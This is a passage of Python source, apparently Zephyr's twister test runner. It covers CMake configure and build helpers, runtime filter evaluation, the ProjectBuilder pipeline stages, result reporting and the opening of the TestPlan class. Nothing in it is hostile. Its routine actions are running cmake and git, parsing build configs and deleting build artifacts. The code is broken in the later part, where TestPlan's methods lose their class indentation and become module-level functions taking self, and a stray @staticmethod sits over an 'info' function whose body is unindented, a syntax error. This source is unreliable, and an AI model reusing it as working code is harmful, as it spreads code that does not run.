        cmd = [cmake] + cmake_args
        kwargs = dict()
        if self.capture_output:
            kwargs['stdout'] = subprocess.PIPE
            # CMake sends the output of message() to stderr unless it's STATUS
            kwargs['stderr'] = subprocess.STDOUT
        if self.cwd:
            kwargs['cwd'] = self.cwd
        p = subprocess.Popen(cmd, **kwargs)
        out, _ = p.communicate()
        results = {}
        if p.returncode == 0:
            msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
            self.instance.status = "passed"
            if not self.instance.run:
                self.instance.add_missing_testscases("skipped", "Test was built only")
            results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
            if out:
                log_msg = out.decode(self.default_encoding)
                with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
                    log.write(log_msg)
            else:
                return None
        else:
            # A real error occurred, raise an exception
            log_msg = ""
            if out:
                log_msg = out.decode(self.default_encoding)
                with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
                    log.write(log_msg)
            if log_msg:
                # A linker section overflow is downgraded to "skipped" unless
                # overflows were explicitly requested to be fatal.
                overflow_found = re.findall("region `(FLASH|ROM|RAM|ICCM|DCCM|SRAM)' overflowed by", log_msg)
                if overflow_found and not self.overflow_as_errors:
                    logger.debug("Test skipped due to {} Overflow".format(overflow_found[0]))
                    self.instance.status = "skipped"
                    self.instance.reason = "{} overflow".format(overflow_found[0])
                else:
                    self.instance.status = "error"
                    self.instance.reason = "Build failure"
            results = {
                "returncode": p.returncode,
                "instance": self.instance,
            }
        return results

    def run_cmake(self, args=[]):
        """Run the cmake configure step for this instance.

        @param args Extra "KEY=value" definitions appended as -D options.
        @return Result dict: {'msg', 'filter'} on success, {'returncode'} on
                failure (and the instance is marked "error").
        """
        if self.warnings_as_errors:
            ldflags = "-Wl,--fatal-warnings"
            cflags = "-Werror"
            aflags = "-Werror -Wa,--fatal-warnings"
            gen_defines_args = "--edtlib-Werror"
        else:
            ldflags = cflags = aflags = ""
            gen_defines_args = ""
        logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
        cmake_args = [
            f'-B{self.build_dir}',
            f'-S{self.source_dir}',
            f'-DTC_RUNID={self.instance.run_id}',
            f'-DEXTRA_CFLAGS={cflags}',
            f'-DEXTRA_AFLAGS={aflags}',
            f'-DEXTRA_LDFLAGS={ldflags}',
            f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}',
            f'-G{self.generator}'
        ]
        # Strip quotes from caller-supplied definitions and pass them as -D.
        args = ["-D{}".format(a.replace('"', '')) for a in args]
        cmake_args.extend(args)
        cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
        cmake_args.extend(cmake_opts)
        logger.debug("Calling cmake with arguments: {}".format(cmake_args))
        cmake = shutil.which('cmake')
        cmd = [cmake] + cmake_args
        kwargs = dict()
        if self.capture_output:
            kwargs['stdout'] = subprocess.PIPE
            # CMake sends the output of message() to stderr unless it's STATUS
            kwargs['stderr'] = subprocess.STDOUT
        if self.cwd:
            kwargs['cwd'] = self.cwd
        p = subprocess.Popen(cmd, **kwargs)
        out, _ = p.communicate()
        if p.returncode == 0:
            # Success: evaluate the runtime filter on the generated config.
            filter_results = self.parse_generated()
            msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
            logger.debug(msg)
            results = {'msg': msg, 'filter': filter_results}
        else:
            self.instance.status = "error"
            self.instance.reason = "Cmake build failure"
            for tc in self.instance.testcases:
                tc.status = self.instance.status
            logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
            results = {"returncode": p.returncode}
        if out:
            with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
                log_msg = out.decode(self.default_encoding)
                log.write(log_msg)
        return results

    @staticmethod
    def run_cmake_script(args=[]):
        """Run a standalone cmake -P script.

        @param args args[0] is the script path; the rest are "KEY=value"
                definitions passed as -D options.
        @return Result dict with returncode plus stdout (success) or
                returnmsg (failure).
        @raises Exception when `cmake` is not found on PATH.
        """
        logger.debug("Running cmake script %s" % (args[0]))
        cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]]
        cmake_args.extend(['-P', args[0]])
        logger.debug("Calling cmake with arguments: {}".format(cmake_args))
        cmake = shutil.which('cmake')
        if not cmake:
            msg = "Unable to find `cmake` in path"
            logger.error(msg)
            raise Exception(msg)
        cmd = [cmake] + cmake_args
        kwargs = dict()
        kwargs['stdout'] = subprocess.PIPE
        # CMake sends the output of message() to stderr unless it's STATUS
        kwargs['stderr'] = subprocess.STDOUT
        p = subprocess.Popen(cmd, **kwargs)
        out, _ = p.communicate()
        # It might happen that the environment adds ANSI escape codes like \x1b[0m,
        # for instance if twister is executed from inside a makefile. In such a
        # scenario it is then necessary to remove them, as otherwise the JSON decoding
        # will fail.
        ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
        out = ansi_escape.sub('', out.decode())
        if p.returncode == 0:
            msg = "Finished running %s" % (args[0])
            logger.debug(msg)
            results = {"returncode": p.returncode, "msg": msg, "stdout": out}
        else:
            logger.error("Cmake script failure: %s" % (args[0]))
            results = {"returncode": p.returncode, "returnmsg": out}
        return results
class FilterBuilder(CMake):
    """CMake subclass used for the filtering stage: after the configure step
    it parses the generated .config / CMakeCache / devicetree data and
    evaluates the testsuite's ``filter:`` expression against it."""

    def __init__(self, testsuite, platform, source_dir, build_dir):
        super().__init__(testsuite, platform, source_dir, build_dir)
        # Filtering output goes to its own log, not build.log.
        self.log = "config-twister.log"

    def parse_generated(self):
        """Parse generated build artifacts and evaluate the runtime filter.

        @return {} for unit_testing; otherwise either a one-entry dict
                {"<platform>/<suite>": bool} (True means "filter out") when
                the suite has a filter expression, or the raw filter_data
                dict when it has none.
        """
        if self.platform.name == "unit_testing":
            return {}
        cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
        defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
        with open(defconfig_path, "r") as fp:
            defconfig = {}
            for line in fp.readlines():
                m = self.config_re.match(line)
                if not m:
                    # Warn about non-comment lines that do not look like
                    # CONFIG_* assignments, then skip them.
                    if line.strip() and not line.startswith("#"):
                        sys.stderr.write("Unrecognized line %s\n" % line)
                    continue
                defconfig[m.group(1)] = m.group(2).strip()
        self.defconfig = defconfig
        cmake_conf = {}
        try:
            cache = CMakeCache.from_file(cmake_cache_path)
        except FileNotFoundError:
            cache = {}
        for k in iter(cache):
            cmake_conf[k.name] = k.value
        self.cmake_cache = cmake_conf
        # Namespace the filter expression is evaluated in: platform info,
        # environment, Kconfig symbols and cmake cache entries.
        filter_data = {
            "ARCH": self.platform.arch,
            "PLATFORM": self.platform.name
        }
        filter_data.update(os.environ)
        filter_data.update(self.defconfig)
        filter_data.update(self.cmake_cache)
        edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
        if self.testsuite and self.testsuite.ts_filter:
            try:
                # Load the devicetree (if generated) so dt_* filter functions work.
                if os.path.exists(edt_pickle):
                    with open(edt_pickle, 'rb') as f:
                        edt = pickle.load(f)
                else:
                    edt = None
                res = expr_parser.parse(self.testsuite.ts_filter, filter_data, edt)
            except (ValueError, SyntaxError) as se:
                sys.stderr.write(
                    "Failed processing %s\n" % self.testsuite.yamlfile)
                raise se
            # True in the returned dict means the instance is filtered out.
            if not res:
                return {os.path.join(self.platform.name, self.testsuite.name): True}
            else:
                return {os.path.join(self.platform.name, self.testsuite.name): False}
        else:
            self.platform.filter_data = filter_data
            return filter_data
class ProjectBuilder(FilterBuilder):
    """Drives one test instance through the cmake -> build -> gather_metrics
    -> run -> report -> cleanup pipeline.  process() consumes one operation
    message and posts the follow-up operation back onto the shared pipeline
    queue."""

    def __init__(self, tplan, instance, **kwargs):
        super().__init__(instance.testsuite, instance.platform, instance.testsuite.source_dir, instance.build_dir)
        self.log = "build.log"
        self.instance = instance
        self.testplan = tplan
        self.filtered_tests = 0
        # Sanitizer / tooling options (all opt-in via kwargs).
        self.lsan = kwargs.get('lsan', False)
        self.asan = kwargs.get('asan', False)
        self.ubsan = kwargs.get('ubsan', False)
        self.valgrind = kwargs.get('valgrind', False)
        self.extra_args = kwargs.get('extra_args', [])
        self.device_testing = kwargs.get('device_testing', False)
        self.cmake_only = kwargs.get('cmake_only', False)
        self.cleanup = kwargs.get('cleanup', False)
        self.coverage = kwargs.get('coverage', False)
        self.inline_logs = kwargs.get('inline_logs', False)
        self.generator = kwargs.get('generator', None)
        self.generator_cmd = kwargs.get('generator_cmd', None)
        self.verbose = kwargs.get('verbose', None)
        self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
        self.overflow_as_errors = kwargs.get('overflow_as_errors', False)
        self.suite_name_check = kwargs.get('suite_name_check', True)
        self.seed = kwargs.get('seed', 0)

    @staticmethod
    def log_info(filename, inline_logs):
        """Surface a log file to the user: dump its contents when
        *inline_logs* is set, otherwise just print its path."""
        filename = os.path.abspath(os.path.realpath(filename))
        if inline_logs:
            logger.info("{:-^100}".format(filename))
            try:
                with open(filename) as fp:
                    data = fp.read()
            except Exception as e:
                data = "Unable to read log data (%s)\n" % (str(e))
            logger.error(data)
            logger.info("{:-^100}".format(filename))
        else:
            logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)

    def log_info_file(self, inline_logs):
        """Pick the most relevant log for the failure and surface it
        (valgrind > handler > device > build)."""
        build_dir = self.instance.build_dir
        h_log = "{}/handler.log".format(build_dir)
        b_log = "{}/build.log".format(build_dir)
        v_log = "{}/valgrind.log".format(build_dir)
        d_log = "{}/device.log".format(build_dir)
        if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
            self.log_info("{}".format(v_log), inline_logs)
        elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
            self.log_info("{}".format(h_log), inline_logs)
        elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
            self.log_info("{}".format(d_log), inline_logs)
        else:
            self.log_info("{}".format(b_log), inline_logs)

    def setup_handler(self):
        """Choose and configure the execution handler for this instance,
        based on platform simulation type / testsuite type / device testing."""
        instance = self.instance
        args = []
        # FIXME: Needs simplification
        if instance.platform.simulation == "qemu":
            instance.handler = QEMUHandler(instance, "qemu")
            args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
            instance.handler.call_make_run = True
        elif instance.testsuite.type == "unit":
            instance.handler = BinaryHandler(instance, "unit")
            instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
            if self.coverage:
                args.append("COVERAGE=1")
        elif instance.platform.type == "native":
            handler = BinaryHandler(instance, "native")
            handler.asan = self.asan
            handler.valgrind = self.valgrind
            handler.lsan = self.lsan
            handler.ubsan = self.ubsan
            handler.coverage = self.coverage
            handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
            instance.handler = handler
        elif instance.platform.simulation == "renode":
            if find_executable("renode"):
                instance.handler = BinaryHandler(instance, "renode")
                instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
                instance.handler.call_make_run = True
        elif instance.platform.simulation == "tsim":
            instance.handler = BinaryHandler(instance, "tsim")
            instance.handler.call_make_run = True
        elif self.device_testing:
            instance.handler = DeviceHandler(instance, "device")
            instance.handler.coverage = self.coverage
        elif instance.platform.simulation == "nsim":
            if find_executable("nsimdrv"):
                instance.handler = BinaryHandler(instance, "nsim")
                instance.handler.call_make_run = True
        elif instance.platform.simulation == "mdb-nsim":
            if find_executable("mdb"):
                instance.handler = BinaryHandler(instance, "nsim")
                instance.handler.call_make_run = True
        elif instance.platform.simulation == "armfvp":
            instance.handler = BinaryHandler(instance, "armfvp")
            instance.handler.call_make_run = True
        elif instance.platform.simulation == "xt-sim":
            instance.handler = BinaryHandler(instance, "xt-sim")
            instance.handler.call_make_run = True
        if instance.handler:
            instance.handler.args = args
            instance.handler.generator_cmd = self.generator_cmd
            instance.handler.generator = self.generator
            instance.handler.suite_name_check = self.suite_name_check

    def process(self, pipeline, done, message, lock, results):
        """Handle one pipeline message for this instance.

        @param pipeline Queue the next operation is posted to.
        @param done Queue finished instances are placed on.
        @param message Dict with at least an 'op' key
               ("cmake"/"build"/"gather_metrics"/"run"/"report"/"cleanup").
        @param lock Lock guarding the report step.
        @param results Shared counters object updated while reporting.
        """
        op = message.get('op')
        if not self.instance.handler:
            self.setup_handler()
        # The build process, call cmake and build with configured generator
        if op == "cmake":
            res = self.cmake()
            if self.instance.status in ["failed", "error"]:
                pipeline.put({"op": "report", "test": self.instance})
            elif self.cmake_only:
                if self.instance.status is None:
                    self.instance.status = "passed"
                pipeline.put({"op": "report", "test": self.instance})
            else:
                # Here we check the runtime filter results coming from running cmake
                if self.instance.name in res['filter'] and res['filter'][self.instance.name]:
                    logger.debug("filtering %s" % self.instance.name)
                    self.instance.status = "filtered"
                    self.instance.reason = "runtime filter"
                    results.skipped_runtime += 1
                    self.instance.add_missing_testscases("skipped")
                    pipeline.put({"op": "report", "test": self.instance})
                else:
                    pipeline.put({"op": "build", "test": self.instance})
        elif op == "build":
            logger.debug("build test: %s" % self.instance.name)
            res = self.build()
            if not res:
                self.instance.status = "error"
                self.instance.reason = "Build Failure"
                pipeline.put({"op": "report", "test": self.instance})
            else:
                # Count skipped cases during build, for example
                # due to ram/rom overflow.
                if self.instance.status == "skipped":
                    results.skipped_runtime += 1
                    self.instance.add_missing_testscases("skipped", self.instance.reason)
                if res.get('returncode', 1) > 0:
                    self.instance.add_missing_testscases("blocked", self.instance.reason)
                    pipeline.put({"op": "report", "test": self.instance})
                else:
                    pipeline.put({"op": "gather_metrics", "test": self.instance})
        elif op == "gather_metrics":
            self.gather_metrics(self.instance)
            if self.instance.run and self.instance.handler:
                pipeline.put({"op": "run", "test": self.instance})
            else:
                pipeline.put({"op": "report", "test": self.instance})
        # Run the generated binary using one of the supported handlers
        elif op == "run":
            logger.debug("run test: %s" % self.instance.name)
            self.run()
            logger.debug(f"run status: {self.instance.name} {self.instance.status}")
            # to make it work with pickle
            self.instance.handler.thread = None
            self.instance.handler.testplan = None
            pipeline.put({
                "op": "report",
                "test": self.instance,
                "status": self.instance.status,
                "reason": self.instance.reason
                }
            )
        # Report results and output progress to screen
        elif op == "report":
            with lock:
                done.put(self.instance)
                self.report_out(results)
            if self.cleanup and not self.coverage and self.instance.status == "passed":
                pipeline.put({
                    "op": "cleanup",
                    "test": self.instance
                })
        elif op == "cleanup":
            if self.device_testing:
                self.cleanup_device_testing_artifacts()
            else:
                self.cleanup_artifacts()

    def cleanup_artifacts(self, additional_keep=[]):
        """Delete build artifacts, keeping only logs/config plus
        *additional_keep*, then prune empty dirs and dir symlinks.
        NOTE(review): mutable default list; safe here since it is only read.
        """
        logger.debug("Cleaning up {}".format(self.instance.build_dir))
        allow = [
            'zephyr/.config',
            'handler.log',
            'build.log',
            'device.log',
            'recording.csv',
            ]
        allow += additional_keep
        allow = [os.path.join(self.instance.build_dir, file) for file in allow]
        for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
            for name in filenames:
                path = os.path.join(dirpath, name)
                if path not in allow:
                    os.remove(path)
            # Remove empty directories and symbolic links to directories
            for dir in dirnames:
                path = os.path.join(dirpath, dir)
                if os.path.islink(path):
                    os.remove(path)
                elif not os.listdir(path):
                    os.rmdir(path)

    def cleanup_device_testing_artifacts(self):
        """Device-testing cleanup: additionally keep the flashable images and
        make the kept metadata files relocatable by stripping absolute paths."""
        logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
        sanitizelist = [
            'CMakeCache.txt',
            'zephyr/runners.yaml',
        ]
        keep = [
            'zephyr/zephyr.hex',
            'zephyr/zephyr.bin',
            'zephyr/zephyr.elf',
            ]
        keep += sanitizelist
        self.cleanup_artifacts(keep)
        # sanitize paths so files are relocatable
        for file in sanitizelist:
            file = os.path.join(self.instance.build_dir, file)
            with open(file, "rt") as fin:
                data = fin.read()
                data = data.replace(canonical_zephyr_base+"/", "")
            with open(file, "wt") as fin:
                fin.write(data)

    def report_out(self, results):
        """Update shared counters for this instance's outcome and print
        either a verbose per-test line or a one-line progress summary."""
        total_to_do = results.total
        total_tests_width = len(str(total_to_do))
        results.done += 1
        instance = self.instance
        if instance.status in ["error", "failed"]:
            if instance.status == "error":
                results.error += 1
            else:
                results.failed += 1
            if self.verbose:
                status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
            else:
                print("")
                logger.error(
                    "{:<25} {:<50} {}FAILED{}: {}".format(
                        instance.platform.name,
                        instance.testsuite.name,
                        Fore.RED,
                        Fore.RESET,
                        instance.reason))
            if not self.verbose:
                self.log_info_file(self.inline_logs)
        elif instance.status in ["skipped", "filtered"]:
            status = Fore.YELLOW + "SKIPPED" + Fore.RESET
            results.skipped_configs += 1
            results.skipped_cases += len(instance.testsuite.testcases)
        elif instance.status == "passed":
            status = Fore.GREEN + "PASSED" + Fore.RESET
            results.passed += 1
            for case in instance.testcases:
                if case.status == 'skipped':
                    results.skipped_cases += 1
        else:
            logger.debug(f"Unknown status = {instance.status}")
            status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
        if self.verbose:
            if self.cmake_only:
                more_info = "cmake"
            elif instance.status in ["skipped", "filtered"]:
                more_info = instance.reason
            else:
                if instance.handler and instance.run:
                    more_info = instance.handler.type_str
                    htime = instance.execution_time
                    if htime:
                        more_info += " {:.3f}s".format(htime)
                else:
                    more_info = "build"
                if ( instance.status in ["error", "failed", "timeout", "flash_error"]
                     and hasattr(self.instance.handler, 'seed')
                     and self.instance.handler.seed is not None ):
                    more_info += "/seed: " + str(self.seed)
            logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
                results.done + results.skipped_filter, total_tests_width, total_to_do , instance.platform.name,
                instance.testsuite.name, status, more_info))
            if instance.status in ["error", "failed", "timeout"]:
                self.log_info_file(self.inline_logs)
        else:
            completed_perc = 0
            if total_to_do > 0:
                completed_perc = int((float(results.done + results.skipped_filter) / total_to_do) * 100)
            sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
                Fore.GREEN,
                results.done + results.skipped_filter,
                total_to_do,
                Fore.RESET,
                completed_perc,
                Fore.YELLOW if results.skipped_configs > 0 else Fore.RESET,
                results.skipped_filter + results.skipped_runtime,
                Fore.RESET,
                Fore.RED if results.failed > 0 else Fore.RESET,
                results.failed,
                Fore.RESET
                )
                )
        sys.stdout.flush()

    def cmake(self):
        """Assemble the cmake argument list (suite extras, handler args and
        merged overlay files) and run the configure step."""
        instance = self.instance
        args = self.testsuite.extra_args[:]
        args += self.extra_args
        if instance.handler:
            args += instance.handler.args
        # merge overlay files into one variable
        def extract_overlays(args):
            re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
            other_args = []
            overlays = []
            for arg in args:
                match = re_overlay.search(arg)
                if match:
                    overlays.append(match.group(1).strip('\'"'))
                else:
                    other_args.append(arg)
            args[:] = other_args
            return overlays
        overlays = extract_overlays(args)
        if os.path.exists(os.path.join(instance.build_dir,
                                       "twister", "testsuite_extra.conf")):
            overlays.append(os.path.join(instance.build_dir,
                                         "twister", "testsuite_extra.conf"))
        if overlays:
            args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
        res = self.run_cmake(args)
        return res

    def build(self):
        """Run the build step for this instance's build directory."""
        res = self.run_build(['--build', self.build_dir])
        return res

    def run(self):
        """Execute the built binary through the configured handler,
        propagating the entropy seed on native_posix when applicable."""
        instance = self.instance
        if instance.handler:
            if instance.handler.type_str == "device":
                instance.handler.testplan = self.testplan
            if(self.seed is not None and instance.platform.name.startswith("native_posix")):
                self.parse_generated()
                if('CONFIG_FAKE_ENTROPY_NATIVE_POSIX' in self.defconfig and
                    self.defconfig['CONFIG_FAKE_ENTROPY_NATIVE_POSIX'] == 'y'):
                    instance.handler.seed = self.seed
            instance.handler.handle()
        sys.stdout.flush()

    def gather_metrics(self, instance):
        """Fill instance.metrics with RAM/ROM sizes (or zeros when size
        reporting is disabled or cmake-only)."""
        if self.testplan.enable_size_report and not self.testplan.cmake_only:
            self.calc_one_elf_size(instance)
        else:
            instance.metrics["ram_size"] = 0
            instance.metrics["rom_size"] = 0
            instance.metrics["unrecognized"] = []

    @staticmethod
    def calc_one_elf_size(instance):
        """Measure RAM/ROM footprint of the produced binary for non-native
        platforms; record the handler execution time alongside."""
        if instance.status not in ["error", "failed", "skipped"]:
            if instance.platform.type != "native":
                size_calc = instance.calculate_sizes()
                instance.metrics["ram_size"] = size_calc.get_ram_size()
                instance.metrics["rom_size"] = size_calc.get_rom_size()
                instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
            else:
                instance.metrics["ram_size"] = 0
                instance.metrics["rom_size"] = 0
                instance.metrics["unrecognized"] = []
            instance.metrics["handler_time"] = instance.execution_time
class TestPlan(DisablePyTestCollectionMixin):
    """Discovers platforms and testsuites, builds the set of test instances
    to configure/build/run, and produces the summary and report files."""

    # Matches "CONFIG_X=value" lines in generated .config files.
    config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
    # Matches generic "KEY=value" lines (devicetree defines).
    dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')

    # Schema used to validate each testsuite yaml file.
    ts_schema = scl.yaml_load(
        os.path.join(ZEPHYR_BASE,
                     "scripts", "schemas", "twister", "testsuite-schema.yaml"))
    # Schema used to validate quarantine yaml files.
    quarantine_schema = scl.yaml_load(
        os.path.join(ZEPHYR_BASE,
                     "scripts", "schemas", "twister", "quarantine-schema.yaml"))

    # Recognized keys of a testsuite yaml entry, with expected type and default.
    testsuite_valid_keys = {"tags": {"type": "set", "required": False},
                            "type": {"type": "str", "default": "integration"},
                            "extra_args": {"type": "list"},
                            "extra_configs": {"type": "list"},
                            "build_only": {"type": "bool", "default": False},
                            "build_on_all": {"type": "bool", "default": False},
                            "skip": {"type": "bool", "default": False},
                            "slow": {"type": "bool", "default": False},
                            "timeout": {"type": "int", "default": 60},
                            "min_ram": {"type": "int", "default": 8},
                            "modules": {"type": "list", "default": []},
                            "depends_on": {"type": "set"},
                            "min_flash": {"type": "int", "default": 32},
                            "arch_allow": {"type": "set"},
                            "arch_exclude": {"type": "set"},
                            "extra_sections": {"type": "list", "default": []},
                            "integration_platforms": {"type": "list", "default": []},
                            "testcases": {"type": "list", "default": []},
                            "platform_type": {"type": "list", "default": []},
                            "platform_exclude": {"type": "set"},
                            "platform_allow": {"type": "set"},
                            "toolchain_exclude": {"type": "set"},
                            "toolchain_allow": {"type": "set"},
                            "filter": {"type": "str"},
                            "harness": {"type": "str"},
                            "harness_config": {"type": "map", "default": {}},
                            "seed": {"type": "int", "default": 0}
                            }

    # File names that mark a directory as containing a sample / testsuite.
    SAMPLE_FILENAME = 'sample.yaml'
    TESTSUITE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testsuite_roots=[], outdir=None):
    """Create a test plan.

    @param board_root_list Directory (or list of directories) to scan for
           platform yaml files.
    @param testsuite_roots Directories to scan for testsuite yaml files.
    @param outdir Base output directory for builds and reports.
    NOTE(review): mutable default lists; safe as long as they are never
    mutated in place -- confirm before changing.
    """
    self.roots = testsuite_roots
    if not isinstance(board_root_list, list):
        self.board_roots = [board_root_list]
    else:
        self.board_roots = board_root_list
    # Test Plan Options
    self.coverage_platform = []
    self.build_only = False
    self.cmake_only = False
    self.cleanup = False
    self.enable_slow = False
    self.device_testing = False
    self.fixtures = []
    self.enable_coverage = False
    self.enable_ubsan = False
    self.enable_lsan = False
    self.enable_asan = False
    self.detailed_skipped_report = False
    self.enable_valgrind = False
    self.extra_args = []
    self.inline_logs = False
    self.enable_sizes_report = False
    self.west_flash = None
    self.west_runner = None
    self.generator = None
    self.generator_cmd = None
    self.warnings_as_errors = True
    self.overflow_as_errors = False
    self.quarantine_verify = False
    self.retry_build_errors = False
    self.suite_name_check = True
    self.seed = 0
    # Keep track of which test cases we've filtered out and why
    self.testsuites = {}
    self.quarantine = {}
    self.platforms = []
    self.platform_names = []
    self.selected_platforms = []
    self.filtered_platforms = []
    self.default_platforms = []
    self.outdir = os.path.abspath(outdir)
    self.discards = {}
    self.load_errors = 0
    self.instances = dict()
    self.total_platforms = 0
    self.start_time = 0
    self.duration = 0
    self.warnings = 0
    # hardcoded for now
    self.duts = []
    # run integration tests only
    self.integration = False
    # used during creating shorter build paths
    self.link_dir_counter = 0
    self.pipeline = None
    self.version = "NA"
    self.modules = []
    self.timestamp = datetime.now().isoformat()
def check_zephyr_version(self):
    """Record the current Zephyr git revision in self.version.

    Leaves the "NA" default in place when git fails or cannot be executed.
    """
    try:
        subproc = subprocess.run(["git", "describe", "--abbrev=12", "--always"],
                                 stdout=subprocess.PIPE,
                                 universal_newlines=True,
                                 cwd=ZEPHYR_BASE)
        if subproc.returncode == 0:
            self.version = subproc.stdout.strip()
            logger.info(f"Zephyr version: {self.version}")
    except OSError:
        # git binary missing or not runnable; version stays "NA".
        logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
    """Return the subset of self.instances belonging to *platform*
    (instance keys have the form "<platform>/<suite>")."""
    prefix = platform + os.sep
    return {key: inst for key, inst in self.instances.items() if key.startswith(prefix)}
def config(self):
    # Debug helper: dump the currently-selected coverage platforms.
    logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self, results=None):
    """Fold every instance's outcome into the shared *results* counters:
    total case count plus filtered/passed/error configuration tallies."""
    for instance in self.instances.values():
        results.cases += len(instance.testsuite.testcases)
        status = instance.status
        if status == 'filtered':
            results.skipped_filter += 1
            results.skipped_configs += 1
        elif status == 'passed':
            results.passed += 1
            results.done += 1
        elif status == 'error':
            results.error += 1
            results.done += 1
def compare_metrics(self, filename):
    """Compare current RAM/ROM metrics against a saved twister.json report.

    @param filename Path to a previous json report.
    @return List of (instance, metric, value, delta, lower_better) tuples
            for every metric that changed; empty list when the report is
            missing.
    """
    # name, datatype, lower results better
    interesting_metrics = [("ram_size", int, True),
                           ("rom_size", int, True)]
    if not os.path.exists(filename):
        logger.error("Cannot compare metrics, %s not found" % filename)
        return []
    results = []
    saved_metrics = {}
    with open(filename) as fp:
        jt = json.load(fp)
        # Index the saved metrics by (suite name, platform).
        for ts in jt.get("testsuites", []):
            d = {}
            for m, _, _ in interesting_metrics:
                d[m] = ts.get(m, 0)
            ts_name = ts.get('name')
            ts_platform = ts.get('platform')
            saved_metrics[(ts_name, ts_platform)] = d
    for instance in self.instances.values():
        mkey = (instance.testsuite.name, instance.platform.name)
        if mkey not in saved_metrics:
            continue
        sm = saved_metrics[mkey]
        for metric, mtype, lower_better in interesting_metrics:
            if metric not in instance.metrics:
                continue
            if sm[metric] == "":
                continue
            delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
            if delta == 0:
                continue
            results.append((instance, metric, instance.metrics.get(metric, 0), delta,
                            lower_better))
    return results
def footprint_reports(self, report, show_footprint, all_deltas,
                      footprint_threshold, last_metrics):
    """Log RAM/ROM footprint deltas versus a previous report.

    @param report Path of the previous report; no-op when falsy.
    @param show_footprint Actually log per-test deltas (vs only counting).
    @param all_deltas Report improvements too, not only regressions.
    @param footprint_threshold Minimum relative change (percent) to report.
    @param last_metrics True when comparing against the last run (affects
           the closing log message only).
    """
    if not report:
        return
    logger.debug("running footprint_reports")
    deltas = self.compare_metrics(report)
    warnings = 0
    if deltas and show_footprint:
        for i, metric, value, delta, lower_better in deltas:
            # Skip improvements unless all deltas were requested.
            if not all_deltas and ((delta < 0 and lower_better) or
                                   (delta > 0 and not lower_better)):
                continue
            percentage = 0
            if value > delta:
                percentage = (float(delta) / float(value - delta))
            # Skip changes below the reporting threshold.
            if not all_deltas and (percentage < (footprint_threshold / 100.0)):
                continue
            logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
                i.platform.name, i.testsuite.name, Fore.YELLOW,
                "INFO" if all_deltas else "WARNING", Fore.RESET,
                metric, delta, value, percentage))
            warnings += 1
    if warnings:
        logger.warning("Deltas based on metrics from last %s" %
                       ("release" if not last_metrics else "run"))
def summary(self, results, unrecognized_sections):
    """Log the final pass/fail/skip summary for the whole run.

    @param results Shared counters collected during the run.
    @param unrecognized_sections When True, unknown binary sections are
           tolerated instead of being counted as failures.
    """
    failed = 0
    run = 0
    for instance in self.instances.values():
        if instance.status == "failed":
            failed += 1
        elif instance.metrics.get("unrecognized") and not unrecognized_sections:
            logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
                         (Fore.RED, Fore.RESET, instance.name,
                          str(instance.metrics.get("unrecognized", []))))
            failed += 1
        # FIXME: need a better way to identify executed tests
        handler_time = instance.metrics.get('handler_time', 0)
        if float(handler_time) > 0:
            run += 1
    if results.total and results.total != results.skipped_configs:
        pass_rate = (float(results.passed) / float(results.total - results.skipped_configs))
    else:
        pass_rate = 0
    logger.info(
        "{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
            Fore.RED if failed else Fore.GREEN,
            results.passed,
            results.total,
            Fore.RESET,
            pass_rate,
            Fore.RED if results.failed else Fore.RESET,
            results.failed + results.error,
            Fore.RESET,
            results.skipped_configs,
            Fore.YELLOW if self.warnings else Fore.RESET,
            self.warnings,
            Fore.RESET,
            self.duration))
    self.total_platforms = len(self.platforms)
    # if we are only building, do not report about tests being executed.
    if self.platforms and not self.build_only:
        logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format(
            results.cases - results.skipped_cases,
            results.skipped_cases,
            len(self.filtered_platforms),
            self.total_platforms,
            (100 * len(self.filtered_platforms) / len(self.platforms))
        ))
    built_only = results.total - run - results.skipped_configs
